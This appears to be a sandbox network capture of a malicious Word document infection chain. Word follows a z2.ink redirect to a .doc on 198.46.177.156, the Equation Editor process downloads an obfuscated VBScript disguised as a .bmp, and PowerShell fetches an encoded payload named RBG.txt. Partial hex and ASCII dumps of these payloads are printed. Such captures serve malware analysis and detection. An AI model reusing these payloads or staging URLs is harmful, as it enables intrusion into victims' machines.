May 27, 2024 18:35:15.506520033 CEST	1236	IN	Data Raw: 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 35 68 6b 57 56 34 65 77 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 Data Ascii: ns/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s
May 27, 2024 18:35:15.506555080 CEST	1236	IN	Data Raw: 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 69 48 30 42 34 75 61 56 49 2e 77 Data Ascii: c.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gs
May 27, 2024 18:35:15.506767035 CEST	1236	IN	Data Raw: 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 Data Ascii: &subset=latin&display=swap // User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;s
May 27, 2024 18:35:15.506802082 CEST	1236	IN	Data Raw: 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e Data Ascii: uery,$=window.jQuery,customHeadScripts=!0,jQuery.noConflict},jQuery.ready=function(r){jqueryParams=[...jqueryParams,r]},$.ready=function(r){jqueryParams=[...jqueryParams,r]},jQuery.load=function(r){jqueryParams=[...jqueryParams,r]},$.load=func
May 27, 2024 18:35:15.511158943 CEST	1236	IN	Data Raw: 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 42 72 61 6e 64 6c 69 6e 6b 20 45 64 67 65 22 3e 3c 6d 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a Data Ascii: etaname="twitter:title" content="Not Found - Brandlink Edge"><metaname="twitter:label1" content="Written by"><metaname="twitter:data1" content="tianqi"><metaname="twitter:label2" content="Time to read"><metaname="twitter:data2" content="L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49166	54.241.153.192	80	1020	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 18:35:15.620872021 CEST	111	OUT	HEAD /nXPJ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: z2.ink
May 27, 2024 18:35:16.201503038 CEST	468	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Edge: smart-1.high-performance.network Location: http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc Date: Mon, 27 May 2024 16:35:11 GMT Vary: Accept-Encoding Server: LINKSGPT Cache-Control: no-store, no-cache, must-revalidate Content-Length: 108 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49167	198.46.177.156	80	1020	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 18:35:16.216969967 CEST	260	OUT	HEAD /xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: 198.46.177.156
May 27, 2024 18:35:16.738387108 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 16:35:16 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 26 May 2024 17:14:39 GMT ETag: "70ea-6195e893196e9" Accept-Ranges: bytes Content-Length: 28906 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword
May 27, 2024 18:35:16.951937914 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 16:35:16 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 26 May 2024 17:14:39 GMT ETag: "70ea-6195e893196e9" Accept-Ranges: bytes Content-Length: 28906 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.22	49168	54.241.153.192	80

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 18:35:20.027926922 CEST	123	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: z2.ink
May 27, 2024 18:35:20.640238047 CEST	261	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Edge: smart-1.high-performance.network Date: Mon, 27 May 2024 16:35:20 GMT Content-Length: 102317 Server: LINKSGPT Cache-Control: no-store, no-cache, must-revalidate Connection: keep-alive
May 27, 2024 18:35:20.640661001 CEST	1236	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><
May 27, 2024 18:35:20.640697956 CEST	1236	IN	Data Raw: 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 Data Ascii: onts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 600;font-stretch: normal;font-display: swap;src: url(h
May 27, 2024 18:35:20.640733957 CEST	1236	IN	Data Raw: 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 Data Ascii: c: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;font-stretch: normal;font-display: sw
May 27, 2024 18:35:20.640830994 CEST	1236	IN	Data Raw: 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 Data Ascii: ly: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exg.woff) format('woff');}@font-face {font
May 27, 2024 18:35:20.640986919 CEST	1236	IN	Data Raw: 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 Data Ascii: ily: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVQ.woff) format('woff');}@font-face {font-f
May 27, 2024 18:35:20.641022921 CEST	1236	IN	Data Raw: 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 35 68 6b 57 56 34 65 77 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 Data Ascii: 2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIc
May 27, 2024 18:35:20.641057014 CEST	1236	IN	Data Raw: 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 69 48 30 42 34 75 61 56 49 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f Data Ascii: A-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126M
May 27, 2024 18:35:20.641091108 CEST	1236	IN	Data Raw: 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b Data Ascii: // User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/m
May 27, 2024 18:35:20.641304016 CEST	1236	IN	Data Raw: 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 7d Data Ascii: s=!0,jQuery.noConflict},jQuery.ready=function(r){jqueryParams=[...jqueryParams,r]},$.ready=function(r){jqueryParams=[...jqueryParams,r]},jQuery.load=function(r){jqueryParams=[...jqueryParams,r]},$.load=function(r){jqueryParams=[...jqueryParams
May 27, 2024 18:35:20.646074057 CEST	1236	IN	Data Raw: 20 46 6f 75 6e 64 20 2d 20 42 72 61 6e 64 6c 69 6e 6b 20 45 64 67 65 22 3e 3c 6d 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 31 22 20 63 6f 6e 74 65 6e 74 3d 22 57 72 69 74 74 65 6e 20 62 79 22 3e 3c 6d 65 74 61 0a 6e 61 Data Ascii: Found - Brandlink Edge"><metaname="twitter:label1" content="Written by"><metaname="twitter:data1" content="tianqi"><metaname="twitter:label2" content="Time to read"><metaname="twitter:data2" content="Less than a minute"> <script type=appl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49169	54.241.153.192	80	1020	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 18:35:20.774620056 CEST	130	OUT	HEAD /nXPJ HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: z2.ink Content-Length: 0 Connection: Keep-Alive
May 27, 2024 18:35:21.392816067 CEST	468	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Edge: smart-1.high-performance.network Location: http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc Date: Mon, 27 May 2024 16:35:20 GMT Vary: Accept-Encoding Server: LINKSGPT Cache-Control: no-store, no-cache, must-revalidate Content-Length: 108 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49170	198.46.177.156	80	1020	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 18:35:21.401210070 CEST	279	OUT	HEAD /xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 198.46.177.156 Content-Length: 0 Connection: Keep-Alive
May 27, 2024 18:35:21.891515017 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 16:35:21 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 26 May 2024 17:14:39 GMT ETag: "70ea-6195e893196e9" Accept-Ranges: bytes Content-Length: 28906 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.22	49171	198.46.177.156	80	3348	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 18:35:24.885535955 CEST	339	OUT	GET /8080/lionarekingofjungleimageshere.bmp HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.46.177.156 Connection: Keep-Alive
May 27, 2024 18:35:25.433310032 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 16:35:25 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 26 May 2024 16:42:50 GMT ETag: "26a68-6195e175f7c3c" Accept-Ranges: bytes Content-Length: 158312 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/bmp Data Raw: ff fe 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 57 00 4d 00 49 00 44 00 61 00 74 00 65 00 53 00 74 00 72 00 69 00 6e 00 67 00 54 00 6f 00 44 00 61 00 74 00 65 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 29 00 0d 00 0a 00 0d 00 0a 00 57 00 4d 00 49 00 44 00 61 00 74 00 65 00 53 00 74 00 72 00 69 00 6e 00 67 00 54 00 6f 00 44 00 61 00 74 00 65 00 20 00 3d 00 20 00 43 00 44 00 61 00 74 00 65 00 28 00 4d 00 69 00 64 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 2c 00 20 00 35 00 2c 00 20 00 32 00 29 00 20 00 26 00 20 00 22 00 2f 00 22 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 4d 00 69 00 64 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 2c 00 20 00 37 00 2c 00 20 00 32 00 29 00 20 00 26 00 20 00 22 00 2f 00 22 00 20 00 26 00 20 00 4c 00 65 00 66 00 74 00 28 00 64 00 74 00 6d 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 65 00 2c 00 20 00 34 00 29 00 20 00 5f 00 0d 00 0a 00 [TRUNCATED] Data Ascii: Function WMIDateStringToDate(dtmEventDate)WMIDateStringToDate = CDate(Mid(dtmEventDate, 5, 2) & "/" & _Mid(dtmEventDate, 7, 2) & "/" & Left(dtmEventDate, 4) _& " " & Mid (dtmEventDate, 9, 2) & ":" & _Mid(dtmEventDate, 11, 2) & ":" & Mid(dtmEventDate, _13, 2))End Function'////////////////////////////////////////////////////////////////////////////////////////'/////////////////////////////////////////////////////////////////////////////
May 27, 2024 18:35:25.433356047 CEST	224	IN	Data Raw: 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 67 00 65 00 74 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 28 00 73 00 74 00 72 00 53 00 Data Ascii: ///////////Function getDescription(strSearch,cType)If foundSlUi <> True Then If cType <> "wmi" Then
May 27, 2024 18:35:25.433393002 CEST	1236	IN	Data Raw: 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 67 00 6c 00 6f 00 62 00 61 00 6c 00 50 00 6f 00 70 00 46 00 61 00 69 00 6c 00 75 00 72 00 65 00 20 00 22 00 73 00 6c 00 75 00 69 00 2e 00 65 00 78 00 65 00 20 00 6e 00 6f 00 74 00 20 00 66 00 6f 00 Data Ascii: globalPopFailure "slui.exe not found.",True quitExit() End IfElse Set objScriptExec = aldeaga
May 27, 2024 18:35:25.433427095 CEST	1236	IN	Data Raw: 72 00 74 00 73 00 22 00 2c 00 20 00 22 00 2f 00 63 00 6b 00 6d 00 73 00 2d 00 64 00 6f 00 6d 00 61 00 69 00 6e 00 22 00 2c 00 20 00 22 00 2f 00 64 00 70 00 69 00 64 00 22 00 2c 00 20 00 22 00 2f 00 61 00 63 00 74 00 73 00 75 00 62 00 22 00 2c 00 Data Ascii: rts", "/ckms-domain", "/dpid", "/actsub", "/dstatussub" connectWMI nephroge,ultrapassar,folheador,"" per
May 27, 2024 18:35:25.433460951 CEST	1236	IN	Data Raw: 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 44 00 69 00 73 00 70 00 6c 00 61 00 79 00 20 00 6c 00 69 00 63 00 65 00 6e 00 73 00 65 00 73 00 74 00 61 00 74 00 75 00 73 00 Data Ascii: 'Display licensestatus for all product keys performLicAction "/poliestesia","",""
May 27, 2024 18:35:25.433495998 CEST	1236	IN	Data Raw: 66 00 20 00 57 00 69 00 6e 00 37 00 20 00 3d 00 20 00 54 00 72 00 75 00 65 00 20 00 54 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 61 00 6e 00 69 00 6c 00 61 00 64 00 6f 00 20 00 4d 00 Data Ascii: f Win7 = True Then anilado MSG_EVENT_1016,"desapaixonar","1016","Office Software Protection Platform Service"
May 27, 2024 18:35:25.433528900 CEST	1236	IN	Data Raw: 31 00 37 00 2c 00 22 00 64 00 65 00 73 00 61 00 70 00 61 00 69 00 78 00 6f 00 6e 00 61 00 72 00 22 00 2c 00 22 00 31 00 30 00 31 00 37 00 22 00 2c 00 22 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2d 00 57 00 69 00 6e 00 64 00 6f 00 Data Ascii: 17,"desapaixonar","1017","Microsoft-Windows-Security-SPP",nephroge anilado MSG_EVENT_1013,"desapaixonar","101
May 27, 2024 18:35:25.433562994 CEST	1236	IN	Data Raw: 6c 00 74 00 72 00 61 00 70 00 61 00 73 00 73 00 61 00 72 00 2c 00 66 00 6f 00 6c 00 68 00 65 00 61 00 64 00 6f 00 72 00 2c 00 22 00 72 00 65 00 67 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 70 00 65 00 72 00 66 00 6f 00 Data Ascii: ltrapassar,folheador,"reg" performRegAction langorosamente Case "/osppsvcrestart", "/osppsvcauto" c
May 27, 2024 18:35:25.433595896 CEST	1236	IN	Data Raw: 78 00 69 00 74 00 28 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 43 00 61 00 73 00 65 00 20 00 22 00 2f 00 76 00 65 00 72 00 73 00 69 00 6f 00 6e 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 67 00 6c 00 6f 00 62 00 61 00 Data Ascii: xit() Case "/version" globalPopSuccess VER_INFO,True Case Else pos = InStr(langorosamente,":")
May 27, 2024 18:35:25.433634043 CEST	1000	IN	Data Raw: 6c 00 65 00 63 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 53 00 65 00 6c 00 65 00 63 00 74 00 20 00 43 00 61 00 73 00 65 00 20 00 67 00 65 00 74 00 43 00 6f 00 Data Ascii: lect Select Case getCommand Case "/skms-domain", "/actype", "/inpkey", "/unpkey", "/inslic
May 27, 2024 18:35:25.438817978 CEST	1236	IN	Data Raw: 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 49 00 66 00 20 00 67 00 65 00 74 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 20 00 3d 00 20 00 22 00 2f 00 64 00 64 00 65 00 73 00 63 00 72 00 22 00 20 00 54 00 68 00 65 00 6e 00 0d 00 0a 00 Data Ascii: If getCommand = "/ddescr" Then If Left(strValue,2) = "0x" Then getD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.22	49175	198.46.177.156	80	3620	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 18:35:44.389811993 CEST	76	OUT	GET /8080/RBG.txt HTTP/1.1 Host: 198.46.177.156 Connection: Keep-Alive
May 27, 2024 18:35:44.883718967 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 16:35:44 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 26 May 2024 16:39:15 GMT ETag: "c558-6195e0a9ce944" Accept-Ranges: bytes Content-Length: 50520 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 27, 2024 18:35:44.883805990 CEST	224	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 27, 2024 18:35:44.883842945 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
